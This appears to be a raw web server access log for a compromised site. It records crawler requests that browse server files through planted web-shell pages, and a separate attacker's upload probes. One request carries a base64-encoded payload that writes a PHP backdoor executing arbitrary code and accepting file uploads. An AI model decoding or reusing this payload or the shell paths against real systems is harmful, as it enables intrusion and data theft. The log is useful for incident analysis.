216.73.216.189 - - [01/Dec/2025:21:22:34 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html%2F1d2be HTTP/1.1" 200 1500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:35 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html%2F35b2e HTTP/1.1" 200 5446 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:33 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.cpanel_vcf_import_contabilidad%40galavista.com.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:35 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.clwpos.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:41 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fsegura.claudia%40galavista.com.vcf.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:43 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.cpanel_vcf_import_segura.claudia%40galavista.com.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:45 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Forders%40galavista.com_personhood.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 745 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:47 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fpersonhood.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 654 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:41 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fgalavista.com.zip&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:23:18 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.segura_claudia%40galavista_com.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:05 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fip&path=%2F%2Fsbin HTTP/1.1" 200 604 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:18:58 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fexim&path=%2F%2Fsbin HTTP/1.1" 200 1140 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:04 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fwww%2F.well-known HTTP/1.1" 200 1458 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
43.130.102.7 - - [01/Dec/2025:21:19:49 +0000] "GET /7709b/?path= HTTP/1.1" 200 750 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.73.216.189 - - [01/Dec/2025:21:22:30 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html%2F29b99 HTTP/1.1" 200 1657 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:30 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.segura_claudia%40galavista_com.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:42 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Foffice.rcube.db.1760706847.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 663 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:23:18 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.softaculous.zip&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 654 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.55.39.225 - - [01/Dec/2025:21:25:11 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:21:27:40 +0000] "GET / HTTP/1.1" 200 1494 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:21:27:42 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:21:28:09 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:21:28:09 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0"
216.73.216.189 - - [01/Dec/2025:21:23:56 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fce685%2Findex.php&path=%2Fhome%2Fi442524%2Fpublic_html%2Fce685 HTTP/1.1" 200 26565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:23:56 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fdfb27f996d.php.php.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:23:56 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Findex.php.php.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
